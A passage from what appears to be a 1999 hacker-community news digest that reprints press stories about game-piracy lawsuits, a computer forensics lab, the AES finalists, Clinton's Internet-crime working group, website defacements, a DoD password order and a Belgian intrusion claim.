      uploaded, traded and distributed copies of their software, U.S.-based Electronic Arts(tm) (Nasdaq:ERTS - news), the industry's largest entertainment software
      publisher, and Sony Computer Entertainment America (SCEA), the company behind the PlayStation(R) game console, the world's best-selling videogame system,
      recently filed suit against certain alleged members of the ring in the U.S. District Court for the Northern District of California. Among other claims, the complaint
      asserts the defendants infringed the copyrights and trademarks of the two companies through the copying and distribution of software owned by Electronic Arts and
      SCEA. 
      
      United States Marshals and lawyers for the companies recently conducted a court-sanctioned seizure and impounded evidence at the location of a participant of the
      group that calls itself ``Paradigm.'' During the seizure, a computer, hard drives, CDs and other items related to the illegal operation were impounded by the Marshals.
      The complaint further notes that the seizure, as well as the investigation which preceded it, produced a significant amount of evidence against members of the
      worldwide ring located in the United States, Canada, the United Kingdom, Germany, the Netherlands, Denmark, Norway, Portugal, Sweden, Russia and other
      locations. The evidence identified by true name and location dozens of participants in the distribution of pirated software belonging to the companies. 
      
      While SCEA and Electronic Arts plan to continue the civil case against the pirates, they also continue to cooperate with law enforcement in the United States and will
      be turning over evidence to authorities in several of the other relevant countries for possible criminal action against the group's members. 
      
      ``Putting an end to software piracy is a top priority for our industry,'' said Ruth Kennedy, senior vice president and general counsel, Electronic Arts. ``Electronic Arts
      and SCEA believe that the break up of pirate Internet rings like this will be key to our success in combating the rising problem of Internet piracy. This action is part
      of our ongoing plan to find and prosecute these thieves.'' 
      
      ``Piracy of packaged entertainment software last year amounted to over US$3.2 billion worldwide for our industry alone. Electronic Arts alone lost more than $400
      million. Internet pirate rings like Paradigm contribute to these losses by uploading games where the industrial pirates in places such as Asia or Russia can download
      them, turn them into copies of packaged goods and rush them to the street -- sometimes even before we get the legitimate goods to market,'' Kennedy noted.
      Pre-release or day-of-release software is highly prized by pirate Internet rings, that compete for ``points'' in the pirate community by being the first to ``release'' an
      illegal version of the product, often with copy protection and other content removed. 
      
      Both companies praised the recently announced criminal ``I.P. Initiative'' by federal authorities including the Department of Justice, the FBI, and U.S. Customs,
      which as its goal has increased criminal prosecutions of pirates of intellectual property. 
      
      According to Riley Russell, vice president of legal and business affairs, Sony Computer Entertainment America, ``We will work diligently to ensure that these
      counterfeiters are fully prosecuted and that others who think Internet piracy and `trading' is acceptable will think again.'' Russell noted that last year alone,
      counterfeiting cost SCEA and Electronic Arts losses of several hundreds of millions of dollars around the globe. 
      
      Other Internet rings besides Paradigm that are also believed to be involved in the pirating of entertainment software include groups calling themselves ``Razor 1911,''
      ``Class,'' ``Origin,'' ``Hybrid'', ``Divine'', ``Fairlight'' and others, with members based in the United States and in many other countries around the world. The
      companies are confident evidence developed in the current case as well as continuing efforts by the entertainment software industry will result in additional civil
      actions and criminal prosecution of members of these groups in the future. 
      
      Electronic Arts, headquartered in Redwood City, California, is the world's leading interactive entertainment software company. Founded in 1982, Electronic Arts
      posted revenues of more than $1.2 billion for fiscal 1999. The company develops, publishes and distributes software worldwide for personal computers and video
      game systems. Electronic Arts markets its products under seven brand names: Electronic Arts, EA SPORTS(tm), Maxis(tm), ORIGIN(tm), Bullfrog(tm)
      Productions, Westwood Studios(tm) and Jane's(R) Combat Simulations. More information about EA's products and full text of press releases can be found on the
      Internet at http://www.ea.com. 
      
      Sony Computer Entertainment America, a division of Sony Computer Entertainment America Inc., markets the PlayStation game console for distribution in North
      America, develops and publishes software for the PlayStation game console, and manages the U.S. third party licensing program. Based in Foster City, Calif., Sony
      Computer Entertainment America Inc. is a wholly-owned subsidiary of Sony Computer Entertainment Inc. 
      
      Note to Editors: Electronic Arts, EA SPORTS, Maxis, ORIGIN, ORIGIN Systems, Bullfrog and Westwood Studios are trademarks or registered trademarks of
      Electronic Arts in the United States and/or other countries. Jane's is a registered trademark of Jane's Information Group, Ltd. PlayStation is a registered trademark
      of Sony Computer Entertainment Inc. 
      
      Contact: 

     Electronic Arts
     Pat Becker, 650/628-7832
           or
     Sony Computer Entertainment America
     Molly Smith, 650/655-6044

10.0 Regional Computer Forensics Lab Set Up in San Diego 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
     
     From HNN http://www.hackernews.com/

      contributed by bluesky 
      With $600,000 provided by two federal grants officials
      have set up the San Diego Regional Computer Forensics
      Laboratory with the support of 32 federal, state and
      local law enforcement agencies. The lab will be manned
      by 14 FBI trained specialists from local police agencies,
      including the San Diego Police Department and the
      Sheriff's Department. The lab will conduct
      court-approved wiretap operations that call for
      intercepting Internet communications as well as data
      recovery and analysis from seized computer systems. 

      San Diego Union Tribune
      http://www.uniontrib.com/news/uniontrib/fri/metro/news_2m6lab.html
     
     
     First regional computer crime
     laboratory set up in San Diego
    
     Forensic team will retrieve electronic
     evidence for use in trials
    
    
    
     By Bruce V. Bigelow  
     STAFF WRITER 
    
     August 6, 1999 
    
    
     Overwhelmed by the use of computers in illegal activities, federal authorities
     have formed a regional crime lab in San Diego that specializes in retrieving
     computerized data and preserving the evidence for trial.
    
     The San Diego Regional Computer Forensics Laboratory is being hailed by
     organizers as the first of its kind, and it already has become a nationwide
     model for law enforcement in other cities -- even before its FBI-trained
     specialists have received their first case.
    
     The lab also is expected to eventually conduct court-approved wiretap
     operations that call for intercepting Internet communications.
    
     "All of us involved in the investigation and prosecution of computer crime view
     the San Diego lab as a prototype of what we hope to establish in various
     jurisdictions around the country," said David Schindler, a federal prosecutor in
     Los Angeles who won convictions of Kevin Mitnick and other notorious
     hackers.
    
     Most of the lab's 14 forensic specialists are sworn officers from local police
     agencies, including the San Diego Police Department and the Sheriff's
     Department. The lab's electronic infrastructure was designed by computer
     security experts at the Navy's Space and Naval Warfare Systems Command
     headquarters.
    
     "This is extremely important, not just a little important," said Alan Paller, a
     computer security expert at the SANS Institute, an international research and
     education cooperative for more than 60,000 system administrators.
    
     "The vast majority of discoveries (of network intrusions) go unresolved
     because there are no resources outside the FBI of any scale. If the probability
     of getting caught and put in jail is far-removed, why worry?"
    
     About $600,000 needed to renovate FBI offices and equip the facility was
     provided by two federal grants, said Mitch Dembin, an assistant U.S. attorney
     in San Diego who proposed the idea.
    
     "I sold this idea to the individuals who are doing this on their own in the
     wilderness of their own departments, and then I sold the idea to the
     department heads in those agencies," Dembin said.
    
     A total of 32 federal, state and local law enforcement agencies have agreed to
     support the lab, he added.
    
     "The idea is one I very much agree with," said Doug Tygar, a professor of
     computer science at the University of California Berkeley who specializes in
     computer security. "Unless they have the ability to deal with digital data, digital
     transactions, law enforcement agencies are going to be behind the curve."
    
     While the FBI established a computer forensics lab at its Washington
     headquarters years ago, experts say the agency also has maintained tight
     controls over the software tools used by its forensic specialists.
    
     "Until now, the FBI only trained its own people," Dembin said.
    
     The San Diego lab's staff members, who completed their FBI training seven
     weeks ago, are now working in temporary quarters until work on the new
     facility is completed in the next month or so.
    
     "What they're doing right now is developing the protocols and processes that
     will be applied to any case," Dembin said. "We're already receiving inquiries
     from all over country . . . which is interesting since we haven't prosecuted a
     single case yet."
    
     The interest prompted Dembin to organize a session about the San Diego lab
     during the High Technology Crime Investigation Association's annual meeting,
     to be held in San Diego's Town & Country Convention Center next month.
    
     The regional lab will help set forensic standards for local investigators and
     provide guidance in the way search warrants are served, computers are
     seized and data is retrieved for evidence at trial, said Bill Gore, who
     supervises the FBI office in San Diego.
    
     "We've been pretty lucky, I think, because so far the defense attorneys
     haven't really homed in on the procedures that we use," said Gore.
    
     The presentation of computerized data at trial can be as complex as DNA
     evidence, he added.
    
     The lab's investigators also are expected to deal with tricky investigations,
     such as a handful of employees who are using a corporate computer network
     for illegal activities.
    
     The "courts are reluctant to let the U.S. attorney shut down a business" by
     seizing control of a company's entire computer system, Dembin said, "so we
     have to come up with tools that minimize our interference with commerce."
    
     For Dembin and other prosecutors, however, a more practical problem
     stemmed from protracted delays in the analysis of computer-based evidence
     seized in cases that ranged from securities fraud to drug crimes.
    
     "There's been a bottleneck in analyzing computer or electronic evidence," said
     Schindler, who usually works with FBI forensics experts in Los Angeles.
    
     Said Dembin: "Putting aside the question of whether the forensics was done
     right, cases were getting disposed of before the seized computers were even
     analyzed."
    
     Dembin's first brush with computer crime occurred in 1991, when he
     prosecuted a disgruntled employee who tried to sabotage General Dynamics
     computers in San Diego with a "logic bomb."
    
     Since then, the 45-year-old prosecutor has handled his own share of
     malicious hacker cases. Over the past eight years, Dembin also saw how con
     artists converted their telemarketing scams into Internet schemes, and he
     oversaw bank fraud cases that relied on computerized financial records.
    
     "Now more and more the only place where documentary evidence exists is on
     the computer," Dembin said. "People are keeping their personal records of
     everyday activities on their computers, and criminal society is no different."
    
    
    
     Copyright 1999 Union-Tribune Publishing Co.  
     
11.0 University Sys Admin Faced with 10 Years for Using Too Much Bandwidth 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
      
      contributed by evenprime 
      A former University of Oklahoma systems administrator
      has been charged with using too much bandwidth. He
      faces a single count of disrupting the university's
      internet service after he allegedly set up a warez site
      on the University owned servers. While not charged with
      piracy or copyright infringement the local DA decided to
      prosecute under the Oklahoma Computer Crimes Act of
      1984 which states that it is a felony to "willfully and
      without authorization disrupt or cause the disruption of
      computer services or deny or cause the denial of access
      or other computer services to an authorized user of a
      computer, computer system or computer network." He
      faces up to 10 years in the state penitentiary and up to
      $100,000 in fines. (So now it is a crime to have a
      popular site? This article fails to mention if this person
      was a legitimate user of the network to begin with.) 

      ZD Net    
      http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------
      
      Disrupting Net access a cybercrime?
      By Robert Lemos, ZDNN
      August 6, 1999 3:28 PM PT
      URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html
      
      A former system administrator of the University of Oklahoma has been charged under the state's
      computer-crime statutes with slowing the university's network to a crawl.
      
      Ryan Breding, 25, faces a single count of disrupting the university's Internet service in 1997, when
      hordes of incoming students downloaded pirated software from servers that he had allegedly set
      up on the university's network. 
      
      "There were times when the authorized users -- students -- were not able to access the Internet at
      all," said Scott Palk, first assistant attorney general for Oklahoma's Cleveland County District
      Attorney's Office.
      
      Known as warez (pronounced "wares"), the software is identical to store-bought versions and
      includes serial numbers to spoof the copy protection mechanisms. The downloads overloaded the
      network, and many students were denied access.
      
      Getting up to speed
      While distributing such software is illegal, the district attorney's office has only charged Breding
      with interfering with network operation. On that charge alone, the former employee faces up to 10
      years in the state penitentiary and up to $100,000 in fines.
      
      The Oklahoma Computer Crimes Act of 1984 makes it a felony to "willfully and without
      authorization disrupt or cause the disruption of computer services or deny or cause the denial of
      access or other computer services to an authorized user of a computer, computer system or
      computer network."
      
      An initial lack of familiarity with computer crimes stymied the investigation. State investigators and
      prosecutors needed to learn how to pursue digital criminals and examine the evidence. 
      
      "These are new crimes -- at least locally," said Palk. "Some people had to undergo training to look
      into it." 
      
      Palk stressed that, for the investigators, the case was a necessary learning experience. "This may
      be a hallmark of things to come," he said. "And we need to be ready."
      
      University officials would not comment for this story. A preliminary hearing is set to start on Aug.
      17.
      
      @HWA
      
12.0 Chaos Computer Camp Fun For All Last Weekend 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/      
      
      contributed by turtlex 
      A computer, some beer, cyber friends, warm grass and a
      new moon, what more could you ask for? Chaos
      Computer Club Camp wrapped up over the weekend,
      people are saying it was the most fun they have had
      since HIP. 

      Wired      
      http://www.wired.com/news/news/culture/story/21159.html
      (Printed in last issue)
      
      
13.0 NIST Announces the AES Finalist Candidates 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

      From HNN http://www.hackernews.com/      
      
      contributed by evilwench 
      Five encryption technologies have made the final cut to
      be the next standard cryptographic mechanism used to
      protect sensitive government information. It has taken
      over a year to whittle the initial field of twelve entries
      down to five, one of which will replace DES, the current
      standard. The final standard is expected to be chosen
      by the Summer of 2001. The five finalists for the
      advanced encryption standard (AES) were named by
      the National Institute of Standards and Technology on
      Monday. The five finalists are MARS, RC6(TM), Rijndael,
      Serpent, and Twofish. 

      Advanced Encryption Standard (AES) Development Effort
      http://www.nist.gov/aes
      Federal Computer Week
      http://www.fcw.com:80/pubs/fcw/1999/0809/web-nist-8-9-99.html
      ZD Net  
      http://www.zdnet.com/zdnn/stories/news/0,4586,1015886,00.html
      
      FCW;
      
      AUGUST 9, 1999 . . . 16:15 EDT 


      NIST names finalists in AES development
    
      BY DIANE FRANK (dfrank@fcw.com)
    
      The National Institute of Standards and Technology today named the five
      finalists in its development of the next-generation Advanced Encryption
      Standard.
    
      NIST has been working with 15 candidates from 12 countries for the past
      year to test their submissions for the AES algorithm. NIST will use AES to
      replace the Data Encryption Standard adopted in 1977 as a federal
      information processing standard for federal agencies. 
    
      The five finalists are 
    
        MARS, developed by IBM Corp., Armonk, N.Y.
    
        RC6, developed by RSA Laboratories, Bedford, Mass.
    
        Rijndael, developed by Joan Daemen and Vincent Rijmen of Belgium.
    
        Serpent, developed by Ross Anderson, Eli Biham and Lars Knudsen of the
      United Kingdom, Israel and Norway, respectively.
    
        Twofish, developed by Bruce Schneier, John Kelsey, Doug Whiting, David
      Wagner, Chris Hall and Niels Ferguson, most of whom are associated with
      Counterpane Systems, Minneapolis, Minn.
    
      All of the candidate algorithms support cryptographic key sizes of 128, 192
      and 256 bits and were tested by NIST and other cryptographic groups
      around the world. 
    
      A full report on the process is available on the AES World Wide Web site at
      www.nist.gov/aes.

      
      -=-
      ZDNET;
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------
      
      Finalists for new crypto standard named
      By Jim Kerstetter, PC Week
      August 9, 1999 1:05 PM PT
      URL: http://www4.zdnet.com/zdnn/stories/news/0,4586,1015886,00.html?chkpt=hpqs014
      
      DES is a step closer to the dustbin. 
      
      The U.S. Commerce Department's National Institute of Standards and Technology (NIST) today
      announced five finalists in the two-year competition to find a replacement for the Data Encryption
      Standard, which has served as the government's basic encryption standard since 1977. 
      
      The replacement, to be called the Advanced Encryption Standard (AES), should be completed by
      the summer of 2001, according to NIST. 
      
      The five finalists include: 
      
           MARS, developed by IBM in Armonk, NY. IBM researchers also created DES back in
           the '70s. 
           RC6, developed by Ron Rivest (inventor of the RSA public key algorithm and several other
           well-known hashing and private key algorithms) and RSA Laboratories in Bedford, Mass. 
           Rijndael, developed by Joan Daemen and Vincent Rijmen of Belgium. 
           Serpent, developed by Ross Anderson, Eli Biham and Lars Knudsen of the United
           Kingdom, Israel and Norway. 
           Twofish, developed by Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris
           Hall and Niels Ferguson of Counterpane Systems in Minneapolis. Schneier also developed
           the popular Blowfish symmetric algorithm. 
      
      Resisting brute force
      DES -- as well as its replacement, AES -- is what cryptographers call a symmetric or private key
      algorithm. A symmetric algorithm requires that both parties receiving encryption have a copy of the
      same encryption key in order to read the scrambled data. It is also likely the most widely used
      encryption algorithm in the world today, supported by most commercial encryption products. 
      
      But DES has proven to be easy prey for modern technology. It uses keys of 56 bits, which were
      first broken nearly three years ago. In January 1999, cryptographers using a special DES-cracking
      machine, along with a nationwide network of PCs, were able to crack DES in less than 24 hours. 
      
      The crackers used a "brute force" method of attack to solve the mathematical factoring behind
      DES. In other words, they put a lot of processing horsepower against the algorithm and were able
      to solve it -- something that has been feasible only in the last couple of years because of
      improvements in chip technology. 
      
      AES on the scene
      Enter the AES. NIST first requested proposals for the AES in September 1997. Each of the
      candidate algorithms supports key sizes of 128, 192 and 256 bits. A 128-bit key cannot be
      broken using known technology today. Each added bit essentially doubles the key strength. 
      
      RSA Data Security Inc. CEO Jim Bidzos used the following analogy at the company's conference
      in January: A 40-bit key is the water that fills a spoon. A 56-bit key is the water that fills a small
      swimming pool. A 128-bit key would be all of the water on the planet. 
      
      "The process has always been about standardization," said Counterpane's Schneier. "AES will be
      the encryption standard for the next 20 or so years, and hence will be used in applications that we
      can't imagine. If a single algorithm is to be chosen for AES, it must be efficient in all current and
      imagined applications." 
      
      NIST will make the five finalist algorithms publicly available. Analysis of the finalists will be
      presented at a conference in April 2000, and public comments will be accepted until May 15,
      2000, according to the NIST. 
      
      @HWA
     
14.0 Clinton Designates Group to Look At CyberCrime 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

      From HNN http://www.hackernews.com/      

      contributed by Ryan 
      On Saturday August 7th, President Clinton issued an
      executive order to establish a working group to examine
      unlawful conduct on the internet. The group is to
      determine if current laws are adequate to combat online
      crime such as child pornography and sales of illegal
      drugs. The executive order also calls for closer
      examination of the tools used by law enforcement to
      investigate these crimes. This could be interpreted as a
      major call for key escrow. The group has been ordered
      to complete its reports within 120 days. 

      US Newswire- Text of Executive Order
      http://www.usnewswire.com/topnews/Current_Releases/0807-107.htm
      ZD Net
      http://www.zdnet.com/zdnn/stories/news/0,4586,2311209,00.html
      Wired     
      http://www.wired.com/news/news/politics/story/21191.html

      Executive order;
      
        
      Text of Clinton Executive Order on Internet Conduct 
      U.S. Newswire 
      7 Aug 11:07 
      
      Text of Clinton Executive Order Establishing Working Group to 
      Examine Unlawful Conduct on the Internet 
      To: National Desk 
      Contact: White House Press Office, 202-456-2100 
      
      WASHINGTON, Aug. 7 /U.S. Newswire/ -- The following is the 
      text of an Executive Order released today by President Clinton: 
      
      EXECUTIVE ORDER 
      - - - - - - - 
      
      WORKING GROUP ON UNLAWFUL CONDUCT 
      ON THE INTERNET 
      
      By the authority vested in me as President by the Constitution 
      and the laws of the United States of America, and in order to 
      address unlawful conduct that involves the use of the Internet, 
      it is hereby ordered as follows: 
      
      Section 1. Establishment and Purpose. 
      
      (a) There is hereby established a working group to address 
      unlawful conduct that involves the use of the Internet ("Working 
      Group"). The purpose of the Working Group shall be to prepare 
      a report and recommendations concerning: 
      
      (1) The extent to which existing Federal laws provide a 
      sufficient basis for effective investigation and prosecution 
      of unlawful conduct that involves the use of the Internet, such 
      as the illegal sale of guns, explosives, controlled substances, 
      and prescription drugs, as well as fraud and child pornography. 
      
      (2) The extent to which new technology tools, capabilities, 
      or legal authorities may be required for effective investigation 
      and prosecution of unlawful conduct that involves the use 
      of the Internet; and 
      
      (3) The potential for new or existing tools and capabilities 
      to educate and empower parents, teachers, and others to prevent 
      or to minimize the risks from unlawful conduct that involves 
      the use of the Internet. 
      
      (b) The Working Group shall undertake this review in the context 
      of current Administration Internet policy, which includes support 
      for industry self-regulation where possible, technology-neutral 
      laws and regulations, and an appreciation of the Internet as 
      an important medium both domestically and internationally for 
      commerce and free speech. 
      
      Sec. 2. Schedule. The Working Group shall complete its work 
      to the greatest extent possible and present its report and 
      recommendations to the President and Vice President within 120 
      days of the date of this order. Prior to such presentation, 
      the report and recommendations shall be circulated through the 
      Office of Management and Budget for review and comment by all 
      appropriate Federal agencies. 
      
      Sec. 3. Membership. 
      
      (a) The Working Group shall be composed of the following 
      members: 
      
      (1) The Attorney General (who shall serve as Chair of the 
      Working Group). 
      
      (2) The Director of the Office of Management and Budget. 
      
      (3) The Secretary of the Treasury. 
      
      (4) The Secretary of Commerce. 
      
      (5) The Secretary of Education. 
      
      (6) The Director of the Federal Bureau of Investigation. 
      
      (7) The Director of the Bureau of Alcohol, Tobacco and 
      Firearms. 
      
      (8) The Administrator of the Drug Enforcement Administration. 
        
      
      (9) The Chair of the Federal Trade Commission. 
      
      (10) The Commissioner of the Food and Drug Administration; 
      and 
      
      (11) Other Federal officials deemed appropriate by the 
      Chair of the Working Group. 
      
      (b) The co-chairs of the Interagency Working Group on Electronic 
      Commerce shall serve as liaison to and attend meetings of the 
      Working Group. Members of the Working Group may serve on the 
      Working Group through designees. 
        
      
      WILLIAM J. CLINTON 
      
      THE WHITE HOUSE, 
      August 5, 1999. 
      
      -0- 
      /U.S. Newswire 202-347-2770/ 
      08/07 11:07 
        
      
      Copyright 1999, U.S. Newswire 
      
      -=-
      
      ZDNET;
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------
      
      Clinton establishes Net crime taskforce
      By Maria Seminerio, ZDNN
      August 9, 1999 12:50 PM PT
      URL: 
      
      UPDATED 3:30 PM PT
      
      President Clinton on Saturday established a working group to address cybercrimes, including
      online sales of illegal drugs and explosives, and online child pornography trafficking. 
      
      The working group is charged with determining whether existing federal laws are sufficient to
      combat Internet-related crime. 
      
      Also, in what seems like a call for widespread key escrow for encrypted communications, Clinton
      ordered the task force to determine "the extent to which new technology tools, capabilities or legal
      authorities may be required for effective investigation and prosecution of unlawful conduct" online. 
      
      The issue of key escrow -- allowing law enforcement a guaranteed "back door" into encrypted
      online messages -- is hugely controversial, and has been a central bone of contention in the debate
      over the Clinton administration's encryption export policies. The director of the Federal Bureau of
      Investigation, Louis Freeh, is a vocal supporter of key escrow, but online privacy advocates
      believe any such plan would be disastrous for individual Internet users. 
      
      "It's a valid concern," said David Sobel, general counsel at the Electronic Privacy Information
      Center, when asked whether the move is a precursor to a more aggressive key escrow push. 
      
      Why no wider investigation?
      With the controversy over illegal Internet porn and online drug and gun sales having sizzled for
      some time, Sobel said it's unclear why the White House should now launch a wider investigation. 
      
      It's also unclear what action, if any, Clinton will take after the group completes its report, a White
      House spokesman told ZDNN Monday. 
      
      Clinton could urge Congress to pass new Net crime laws, although there is no specific plan for him
      to do so, the spokesman said. 
      
      Another administration official, speaking on condition of anonymity, said the task force's work
      won't be specifically aimed at the key escrow issue. 
      
      "We just wanted to take a step back and see what new laws, if any, are needed" to address
      cybercrimes, the official told ZDNN. 
      
      The task force will include Freeh, Attorney General Janet Reno, and other federal officials, such as
      the director of the Office of Management and Budget, the Secretary of the Treasury, the
      Commerce Secretary and the director of the Bureau of Alcohol, Tobacco and Firearms. The
      co-chairs of the Advisory Commission on E-Commerce will serve as liaisons. 
      
      Clinton ordered the group to complete a report within 120 days, and many federal agencies will
      have a chance to respond before it is made public. 

      -=-
      Wired;
      
      Plan B for Cyber Space
      Wired News Report 
      
      5:00 p.m.  9.Aug.99.PDT
      President Clinton has asked his advisers to come up with new ways to combat illegal online activity including child porn and the sale of guns, drugs,
      and explosives. 
      
      In announcing a new working group on unlawful conduct on the Internet, the Administration stopped short of calling for new laws. Instead, Vice
      President Gore said the feds may need new technology tools, capabilities, or legal authorities to fight cybercrime. 
      
            
      "What we need to do is find new answers to old crimes," said Gore in a statement released Friday. 
      
      About 11 federal agencies will participate in the working group, including the Bureau of Alcohol, Tobacco, and Firearms; the FBI; the Commerce
      Department; the Food and Drug Administration; and the Drug Enforcement Agency. 
      
      Each agency will solicit ideas for deterring cybercrime from the private sector and from state and local law enforcement officials. 
      
      "The working group will help to make the Internet a safe place for all Americans by examining the extent to which existing federal law and
      technological tools are effective in combating crime on the Internet," Gore said. 
      
      The working group will make its recommendations in four months in the context of current policies and principles. Among those principles: that
      industry should self-regulate, that laws should be technology-neutral, and that the Internet is an important medium for commerce and free speech. 
      
      The administration announced the new strategy only weeks after lawmakers and privacy activists panned a Clinton-approved plan to develop a
      nationwide surveillance network. 
      
      That proposed network, recommended by the White House National Security Council and known as the Federal Intrusion Detection Network
      (Fidnet), sought to fight cybercrime by vacuuming up electronic signals. 
      
      Prominent House Republicans slammed that plan. House Majority Leader Dick Armey warned that the Fidnet could grow into an "Orwellian" system. 
      
      @HWA
      
15.0 Taiwan Government Web Sites Defaced 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
      From HNN http://www.hackernews.com/      

      contributed by Weld Pond 
      Several Taiwanese government web sites have been
      defaced by someone claiming to be from the Hunan
      province in China. The defacements contained political
      statements, in Chinese and English, concerning Taiwan's
      political status. An unidentified official said that he did
      not think that firewalls were necessary on public web
      servers. 

      Excite News      
      http://news.excite.com/news/r/990809/02/net-taiwan-hacker
      
      Pro-China Hacker Attacks Taiwan Govt. Web sites
                             

                                                                        Updated 2:58 AM ET August 9, 1999

     TAIPEI, Taiwan (Reuters) - A person claiming to be from mainland China hacked into several Taiwan government Internet sites
     to insert pro-China messages amid a heated row between the two sides over Taiwan's political status.
   
     "Only one China exists and only one China is needed," read a message inserted Sunday into the Web site of the Control Yuan
     -- Taiwan's highest watchdog agency.
   
     In apparent references to President Lee Teng-hui's controversial call for "special state-to-state" ties between Taiwan and China,
     the message said Taiwan was and would always be an inseparable part of China.
   
     "The Taiwanese government headed by Lee Teng-hui can not deny it."
   
     The same messages -- in Chinese and English -- were placed in several other government Web sites, a Control Yuan official
     said Monday.
   
     "It looks like it was the same person who claimed to come from Hunan province," the official, who declined to be identified,
     said by telephone.
   
     The official said public Web sites were relatively easy to hack into.
   
     "It is a public Web site containing open information, so we didn't think firewalls were necessary," the official said. "Now we
     know it's a problem and we will fix it in the next few days."
   
     Firewalls are electronic security screens.
   
     Lee's redefinition of cross-strait ties has infuriated Beijing, which views the island as a wayward province and vows to bring it
     under mainland rule, by force if necessary. 

     @HWA
     
16.0 DoD Ordered to Change All Passwords 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/      

      contributed by Sarge 
      The Defense Department has ordered all administrative
      and user passwords on their unclassified networks to be
      changed. The official reason is to protect against
      possible Y2K cyber attacks. Rumours indicate that this
      order may be the result of recent computer security
      breaches. 

      Federal Computer Week     
      http://www.fcw.com:80/pubs/fcw/1999/0809/fcw-newsdod-08-09-99.html
      
      
      AUGUST 9, 1999 


      DOD: Change Passwords

      BY DANIEL VERTON (dan_verton@fcw.com)

      Concerned that efforts to fix computer systems for the Year 2000 problem
      may expose its information infrastructure to cyberattacks, the Defense
      Department has ordered its network managers to change all administrative and
      user passwords on their unclassified networks.

      The order is the result of mandatory guidance issued last month to all of the
      military services' network security organizations by the Joint Task Force for
      Computer Network Defense. While a JTF-CND spokesperson could not
      confirm or deny rumors that the guidance may be the result of a recent breach
      of computer security, the spokesperson said that the FBI's National
      Infrastructure Protection Center is currently investigating intrusions into
      unclassified DOD networks.

      "We're trying to start a better process for password protection," the
      spokesperson said. "We gave [our components and other DOD
      organizations] several weeks to do this [because] we know it can't be done
      overnight."

      The JTF-CND, which was formed last December, serves as the focal point
      for DOD to organize the defense of DOD computer networks and systems.
      When cyberattacks are detected, the JTF-CND is responsible for directing
      departmentwide defenses to stop or contain damage and restore DOD
      network functions operations.

      The mandatory actions called for by the JTF-CND directive include changing
      all administrative and user passwords for all unclassified systems and then
      restarting the operating systems for systems that are connected to the
      network. The process is known as a "warm boot" and is not a full shutdown of
      the system, the spokesperson said.

      Major commands affected by the guidance and responsible for managing
      compliance in their respective services include the Air Force Information
      Warfare Center, the Army's Land Information Warfare Activity, the Defense
      Information Systems Agency, the Marine Corps' Marine Forces-CND and
      the Navy Component Task Force-CND.

      As a result of the directive, the NCTF-CND issued classified and unclassified
      messages ordering password changes. However, a spokesman for the Space
      and Naval Warfare Systems Command, one of the primary recipients of the
      message, declined to comment because of the sensitivity of the message's
      content.

      In an administrative message issued last week by the NCTF-CND, the Navy
      offered technical guidance to system administrators on how to deal with the
      lack of password date-change tracking functionality in Microsoft Corp.'s
      Windows NT.

      As a result, the Navy has made three software tools available over the Internet
      to help administrators automate the enforcement of password changes.

      In May, Art Money, senior civilian official acting as the assistant secretary of
      Defense for command, control, communications and intelligence, issued a
      DOD-wide memorandum about the potential threat to DOD networks posed
      by the Year 2000 computer problem. In that memo, Money cited DOD
      Administrative Instruction 26, which provides specific guidance on the use of
      passwords.

      A DOD spokesperson said there is "no inherent connection between the May
      5 Money memo and the July 23 [JTF-CND] message -- other than they are
      related in the context of the department constantly putting out guidance that
      requires vigilance over our networks." 


     @HWA
     
17.0 Belgians Under Cyber Attack From One Man 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/      

      contributed by superman 
      ReDatAck, a Belgian man, has claimed to have broken
      into the database of Skynet, owned by Belgian
      state-run telecommunications operator Belgacom, and
      accessed private information on over 1,000 users. The
      information allegedly includes credit card numbers and
      passwords. ReDatAck has also claimed to have broken
      into the free address book server of Lycos. ReDatAck
      has said that he is trying to alert people to the security
      weaknesses of the internet. 

      Yahoo News     
      http://dailynews.yahoo.com/h/nm/19990809/wr/belgium_hacker_1.html
      
      Monday August 9 12:38 PM ET 

      Belgian Hacker Warns Of Internet Security Risk
      
      BRUSSELS (Reuters) - A computer hacker who broke into Belgium's
      leading Internet access provider vowed Monday to carry on attacking
      Web sites and databases in a bid to alert Belgium to the security risks 
      of the Internet.
      
      ``ReDatAck'', a man in his twenties, told Reuters by telephone he had 
      broken into the database of Skynet, owned by Belgian state-run
      telecommunications operator Belgacom, Friday night and obtained secret
      information on over 1,000 users.
      
      ``I have...their Visa (credit card) numbers and expiration dates, their 
      login and passwords, access to their Web sites,'' ``ReDatAck'' said, stressing
      he wanted to ``wake up Belgium'' to the Internet's security risks rather 
      than misuse the information.
      
      ``Nobody thinks about security,'' he said.
      
      Skynet director Philippe Lemmens said Monday he planned to file a complaint
      against ``ReDatAck'' and assured users that security had been stepped up against
      future hackers.
      
      But ``ReDatAck'', who claimed he had also broken into the free address book server
      of U.S. Internet portal Lycos, was undeterred.
      
      ``I'll go on hacking. They can try to find me. It doesn't scare me. If they do find
       me, it will make more publicity,'' he said, adding that he was currently working on
      breaking into a hospital database. He declined to say which hospital. 
      
      @HWA
      
18.0 IRDP Hole in Win and Sol Leave Users Open to Attack
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
